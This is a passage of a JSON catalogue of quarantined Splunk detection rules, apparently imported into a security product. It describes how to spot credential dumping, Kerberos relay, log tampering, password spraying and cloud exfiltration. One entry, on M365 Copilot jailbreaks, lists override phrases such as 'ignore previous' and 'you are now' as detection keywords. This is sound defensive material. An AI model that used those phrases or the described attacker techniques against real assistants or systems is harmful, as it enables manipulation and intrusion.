leveraging a compromised certificate to request Kerberos tickets, potentially leading to unauthorized access. If confirmed malicious, this could allow attackers to escalate privileges and persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/petitpotam-suspicious-kerberos-tgt-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e3ef244e-0a67-11ec-abf2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml" } }, { "id": "splunk-security-content-e40a40a1-9fea-4554-abdf-b164422f0627", "type": "detection", "name": "Windows Rdp AutomaticDestinations Deletion", "description": "This detection identifies the deletion of files within the AutomaticDestinations folder, located under a user\u2019s AppData\\Roaming\\Microsoft\\Windows\\Recent directory. These files are part of the Windows Jump List feature, which records recently accessed files and folders tied to specific applications. Each .automaticDestinations-ms file corresponds to a program (e.g., Explorer, Word, Notepad) and can be valuable for forensic analysis of user activity. Adversaries may target this folder to erase evidence of their actions, such as which documents or directories were accessed during a session. This type of deletion is rarely seen during normal user activity and may indicate deliberate anti-forensic behavior. When correlated with suspicious logon events, RDP usage, or script execution, this activity may represent an attempt to cover tracks after data access, lateral movement, or staging for exfiltration. Detecting removal of these artifacts can highlight post-compromise cleanup efforts and help analysts reconstruct attacker behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-automaticdestinations-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e40a40a1-9fea-4554-abdf-b164422f0627", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_automaticdestinations_deletion.yml" } }, { "id": "splunk-security-content-e40ef542-8241-4419-9af4-6324582ea60a", "type": "detection", "name": "Windows KrbRelayUp Service Creation", "description": "The following analytic detects the creation of a service with the default name \"KrbSCM\" associated with the KrbRelayUp tool. It leverages Windows System Event Logs, specifically EventCode 7045, to identify this activity. This behavior is significant as KrbRelayUp is a known tool used for privilege escalation attacks. If confirmed malicious, this activity could allow an attacker to escalate privileges, potentially gaining unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-krbrelayup-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e40ef542-8241-4419-9af4-6324582ea60a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_krbrelayup_service_creation.yml" } }, { "id": "splunk-security-content-e4384bbf-5835-4831-8d85-694de6ad2cc6", "type": "detection", "name": "AWS Exfiltration via Anomalous GetObject API Activity", "description": "The following analytic identifies anomalous GetObject API activity in AWS, indicating potential data exfiltration attempts. It leverages AWS CloudTrail logs and uses the `anomalydetection` command to detect unusual patterns in the frequency of GetObject API calls by analyzing fields such as \"count,\" \"user_type,\" and \"user_arn\" within a 10-minute window. This activity is significant as it may indicate unauthorized data access or exfiltration from S3 buckets. If confirmed malicious, attackers could exfiltrate sensitive data, leading to data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-anomalous-getobject-api-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4384bbf-5835-4831-8d85-694de6ad2cc6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_anomalous_getobject_api_activity.yml" } }, { "id": "splunk-security-content-e451bd16-e4c5-4109-8eb1-c4c6ecf048b4", "type": "detection", "name": "Suspicious Rundll32 no Command Line Arguments", "description": "The following analytic detects the execution of rundll32.exe without any command line arguments.\nThis behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution logs.\nIt is significant because rundll32.exe typically requires command line arguments to function properly, and its absence is often associated with malicious activities, such as those performed by Cobalt Strike.\nIf confirmed malicious, this activity could indicate an attempt to execute arbitrary code, potentially leading to credential dumping, unauthorized file writes, or other malicious actions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e451bd16-e4c5-4109-8eb1-c4c6ecf048b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-e4602172-db86-4315-86df-da66fb40bcde", "type": "detection", "name": "Windows Unusual SysWOW64 Process Run System32 Executable", "description": "The following analytic detects an unusual process execution pattern where a process running from C:\\Windows\\SysWOW64\\ attempts to execute a binary from C:\\Windows\\System32\\. In a typical Windows environment, 32-bit processes under SysWOW64 should primarily interact with 32-bit binaries within the same directory. However, an execution flow where a 32-bit process spawns a 64-bit binary from System32 can indicate potential process injection, privilege escalation, evasion techniques, or unauthorized execution hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-syswow64-process-run-system32-executable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4602172-db86-4315-86df-da66fb40bcde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_syswow64_process_run_system32_executable.yml" } }, { "id": "splunk-security-content-e4723b92-7266-11ec-af45-acde48001122", "type": "detection", "name": "Windows Possible Credential Dumping", "description": "The following analytic detects potential credential dumping by identifying specific GrantedAccess permission requests and CallTrace DLLs targeting the LSASS process. It leverages Sysmon EventCode 10 logs, focusing on access requests to lsass.exe and call traces involving debug and native API DLLs like dbgcore.dll, dbghelp.dll, and ntdll.dll. This activity is significant as credential dumping can lead to unauthorized access to sensitive credentials. If confirmed malicious, attackers could gain elevated privileges and persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-possible-credential-dumping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4723b92-7266-11ec-af45-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_possible_credential_dumping.yml" } }, { "id": "splunk-security-content-e4a96dfd-667a-4487-b942-ccef5a1e81e8", "type": "detection", "name": "Windows Find Interesting ACL with FindInterestingDomainAcl", "description": "The following analytic detects the execution of the `Find-InterestingDomainAcl` cmdlet, part of the PowerView toolkit, using PowerShell Script Block Logging (EventCode=4104). This detection leverages logs to identify when this command is run, which is significant as adversaries may use it to find misconfigured or unusual Access Control Lists (ACLs) within a domain. If confirmed malicious, this activity could allow attackers to identify privilege escalation opportunities or weak security configurations in Active Directory, potentially leading to unauthorized access or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-find-interesting-acl-with-findinterestingdomainacl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4a96dfd-667a-4487-b942-ccef5a1e81e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_find_interesting_acl_with_findinterestingdomainacl.yml" } }, { "id": "splunk-security-content-e4c73d68-794b-468d-b4d0-dac1772bbae7", "type": "detection", "name": "GetAdGroup with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdGroup` PowerShell cmdlet using PowerShell Script Block Logging (EventCode=4104). This cmdlet is used to enumerate all domain groups, which adversaries may exploit for situational awareness and Active Directory discovery. Monitoring this activity is crucial as it can indicate reconnaissance efforts within the network. If confirmed malicious, this behavior could lead to further exploitation, such as privilege escalation or lateral movement, by providing attackers with detailed information about the domain's group structure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getadgroup-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4c73d68-794b-468d-b4d0-dac1772bbae7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getadgroup_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-e4df4676-ea41-4397-b160-3ee0140dc332", "type": "detection", "name": "Windows Gather Victim Host Information Camera", "description": "The following analytic detects a PowerShell script that enumerates camera devices on the targeted host. This detection leverages PowerShell Script Block Logging, specifically looking for commands querying Win32_PnPEntity for camera-related information. This activity is significant as it is commonly observed in DCRat malware, which collects camera data to send to its command-and-control server. If confirmed malicious, this behavior could indicate an attempt to gather sensitive visual information from the host, potentially leading to privacy breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1592.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-host-information-camera.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e4df4676-ea41-4397-b160-3ee0140dc332", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_gather_victim_host_information_camera.yml" } }, { "id": "splunk-security-content-e51fbdb0-0be0-474f-92ea-d289f71a695e", "type": "detection", "name": "Windows Network Share Interaction Via Net", "description": "The following analytic identifies network share discovery and collection activities performed on Windows systems using the Net command. Attackers often use network share discovery to identify accessible shared resources within a network, which can be a precursor to privilege escalation or data exfiltration. By monitoring Windows Event Logs for the usage of the Net command to list and interact with network shares, this detection helps identify potential reconnaissance and collection activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1135", "T1039" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-network-share-interaction-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e51fbdb0-0be0-474f-92ea-d289f71a695e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_network_share_interaction_via_net.yml" } }, { "id": "splunk-security-content-e52f7865-be78-46bf-b7ed-150fbe447613", "type": "detection", "name": "Windows Password Policy Discovery with Net", "description": "The following analytic identifies the execution of `net.exe` with command line arguments aimed at obtaining the computer or domain password policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential reconnaissance efforts by adversaries to gather information about Active Directory password policies. If confirmed malicious, this behavior could allow attackers to understand password complexity requirements, aiding in brute-force or password-guessing attacks, ultimately compromising user accounts and gaining unauthorized access to the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-password-policy-discovery-with-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e52f7865-be78-46bf-b7ed-150fbe447613", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_password_policy_discovery_with_net.yml" } }, { "id": "splunk-security-content-e530beb9-9b8c-4c9b-9776-0a05521ff32d", "type": "detection", "name": "ESXi Syslog Config Change", "description": "This detection identifies changes to the syslog configuration on an ESXi host using esxcli, which may indicate an attempt to disrupt log collection and evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-syslog-config-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e530beb9-9b8c-4c9b-9776-0a05521ff32d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_syslog_config_change.yml" } }, { "id": "splunk-security-content-e5928ff3-23eb-4d8b-b8a4-dcbc844fdfbe", "type": "detection", "name": "Unload Sysmon Filter Driver", "description": "The following analytic detects the use of `fltMC.exe` to unload the Sysmon driver, which stops Sysmon from collecting data. It leverages Endpoint Detection and Response (EDR) logs, focusing on process names and command-line executions. This activity is significant because disabling Sysmon can blind security monitoring, allowing malicious actions to go undetected. If confirmed malicious, this could enable attackers to execute further attacks without being logged, leading to potential data breaches, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/unload-sysmon-filter-driver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5928ff3-23eb-4d8b-b8a4-dcbc844fdfbe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/unload_sysmon_filter_driver.yml" } }, { "id": "splunk-security-content-e59b5a73-32bf-4467-a585-452c36ae10c1", "type": "detection", "name": "Windows MOF Event Triggered Execution via WMI", "description": "The following analytic detects the execution of MOFComp.exe loading a MOF file, often triggered by cmd.exe or powershell.exe, or from unusual paths like User Profile directories. It leverages Endpoint Detection and Response (EDR) data, focusing on process names, parent processes, and command-line executions. This activity is significant as it may indicate an attacker using WMI for persistence or lateral movement. If confirmed malicious, it could allow the attacker to execute arbitrary code, maintain persistence, or escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mof-event-triggered-execution-via-wmi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e59b5a73-32bf-4467-a585-452c36ae10c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml" } }, { "id": "splunk-security-content-e5ab41bf-745d-4f72-a393-2611151afd8e", "type": "detection", "name": "Azure AD High Number Of Failed Authentications From Ip", "description": "The following analytic detects an IP address with 20 or more failed authentication attempts to an Azure AD tenant within 10 minutes. It leverages Azure AD SignInLogs to identify repeated failed logins from the same IP. This behavior is significant as it may indicate a brute force attack aimed at gaining unauthorized access or escalating privileges. If confirmed malicious, the attacker could potentially compromise user accounts, leading to unauthorized access to sensitive information and resources within the Azure environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001", "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-high-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5ab41bf-745d-4f72-a393-2611151afd8e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_high_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-e5b7b5a9-e471-4be8-8c5d-4083983ba329", "type": "detection", "name": "Windows Remote Access Software RMS Registry", "description": "The following analytic detects the creation or modification of Windows registry entries related to the Remote Manipulator System (RMS) Remote Admin tool. It leverages data from the Endpoint.Registry datamodel, focusing on registry paths containing \"SYSTEM\\\\Remote Manipulator System.\" This activity is significant because RMS, while legitimate, is often abused by adversaries, such as in the Azorult malware campaigns, to gain unauthorized remote access. If confirmed malicious, this could allow attackers to remotely control the targeted host, leading to potential data exfiltration, system manipulation, or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-access-software-rms-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5b7b5a9-e471-4be8-8c5d-4083983ba329", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_access_software_rms_registry.yml" } }, { "id": "splunk-security-content-e5c7b380-19da-42e9-9e53-0af4cd27aee3", "type": "detection", "name": "M365 Copilot Agentic Jailbreak Attack", "description": "Detects agentic AI jailbreak attempts that try to establish persistent control over M365 Copilot through rule injection, universal triggers, response automation, system overrides, and persona establishment techniques. The detection analyzes the PromptText field for keywords like \"from now on,\" \"always respond,\" \"ignore previous,\" \"new rule,\" \"override,\" and role-playing commands (e.g., \"act as,\" \"you are now\") that attempt to inject persistent instructions. The search computes risk by counting distinct jailbreak indicators per user session, flagging coordinated manipulation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/m365-copilot-agentic-jailbreak-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e5c7b380-19da-42e9-9e53-0af4cd27aee3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/m365_copilot_agentic_jailbreak_attack.yml" } }, { "id": "splunk-security-content-e600cf1a-0bef-4426-b42e-00176d610a4d", "type": "detection", "name": "O365 OAuth App Mailbox Access via EWS", "description": "The following analytic detects when emails are accessed in Office 365 Exchange via Exchange Web Services (EWS) using OAuth-authenticated applications. It leverages the ClientInfoString field to identify EWS interactions and aggregates metrics such as access counts, timing, and client IP addresses, categorized by user, ClientAppId, OperationCount, and AppId. Monitoring OAuth applications accessing emails through EWS is crucial for identifying potential abuse or unauthorized data access. If confirmed malicious, this activity could lead to unauthorized email access, data exfiltration, or further compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-oauth-app-mailbox-access-via-ews.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e600cf1a-0bef-4426-b42e-00176d610a4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_oauth_app_mailbox_access_via_ews.yml" } }, { "id": "splunk-security-content-e61918fa-9ca4-11eb-836c-acde48001122", "type": "detection", "name": "Windows Multiple Users Fail To Authenticate Wth ExplicitCredentials", "description": "The following analytic identifies a source user failing to authenticate with 30 unique users using explicit credentials on a host. It leverages Windows Event 4648, which is generated when a process attempts an account logon by explicitly specifying account credentials. This detection is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges within an Active Directory environment. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-fail-to-authenticate-wth-explicitcredentials.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e61918fa-9ca4-11eb-836c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_fail_to_authenticate_wth_explicitcredentials.yml" } }, { "id": "splunk-security-content-e62c9c2e-bf51-4719-906c-3074618fcc1c", "type": "detection", "name": "Azure AD Authentication Failed During MFA Challenge", "description": "The following analytic identifies failed authentication attempts against an Azure AD tenant during the Multi-Factor Authentication (MFA) challenge, specifically flagged by error code 500121. It leverages Azure AD SignInLogs to detect these events. This activity is significant as it may indicate an adversary attempting to authenticate using compromised credentials on an account with MFA enabled. If confirmed malicious, this could suggest an ongoing effort to bypass MFA protections, potentially leading to unauthorized access and further compromise of the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004", "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-authentication-failed-during-mfa-challenge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e62c9c2e-bf51-4719-906c-3074618fcc1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_authentication_failed_during_mfa_challenge.yml" } }, { "id": "splunk-security-content-e633a0ef-2a6e-4ed7-b925-5ff999e5d1f0", "type": "detection", "name": "Windows AD Domain Controller Promotion", "description": "The following analytic identifies a genuine Domain Controller (DC) promotion event by detecting when a computer assigns itself the necessary Service Principal Names (SPNs) to function as a domain controller. It leverages Windows Security Event Code 4742 to monitor existing domain controllers for these changes. This activity is significant as it can help identify rogue DCs added to the network, which could indicate a DCShadow attack. If confirmed malicious, this could allow an attacker to manipulate Active Directory, leading to potential privilege escalation and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-controller-promotion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e633a0ef-2a6e-4ed7-b925-5ff999e5d1f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_controller_promotion.yml" } }, { "id": "splunk-security-content-e64399d4-94a8-11ec-a9da-acde48001122", "type": "detection", "name": "Windows Process With NamedPipe CommandLine", "description": "The following analytic detects processes with command lines containing named pipes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This behavior is significant as it is often used by adversaries, such as those behind the Olympic Destroyer malware, for inter-process communication post-injection, aiding in defense evasion and privilege escalation. If confirmed malicious, this activity could allow attackers to maintain persistence, escalate privileges, or evade defenses, potentially leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-with-namedpipe-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e64399d4-94a8-11ec-a9da-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_with_namedpipe_commandline.yml" } }, { "id": "splunk-security-content-e651795f-b2c9-4a84-a18a-b901018a3bfa", "type": "detection", "name": "Windows RunMRU Registry Key or Value Deleted", "description": "The following analytic detects the deletion or modification of Most Recently Used (MRU) command entries stored within the Windows Registry. Adversaries often clear these registry keys, such as HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU, to remove forensic evidence of commands executed via the Windows Run dialog or other system utilities. This activity aims to obscure their actions, hinder incident response efforts, and evade detection. Detection focuses on monitoring for changes (deletion of values or modification of the MRUList value) to these specific registry paths, particularly when performed by unusual processes or outside of typical user behavior. Anomalous deletion events can indicate an attempt at defense evasion or post-exploitation cleanup by a malicious actor.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-runmru-registry-key-or-value-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e651795f-b2c9-4a84-a18a-b901018a3bfa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_runmru_registry_key_or_value_deleted.yml" } }, { "id": "splunk-security-content-e6d2dc61-a8b9-4b03-906c-da0ca75d71b8", "type": "detection", "name": "Detect Certify Command Line Arguments", "description": "The following analytic detects the use of Certify or Certipy tools to enumerate Active Directory Certificate Services (AD CS) environments. It leverages 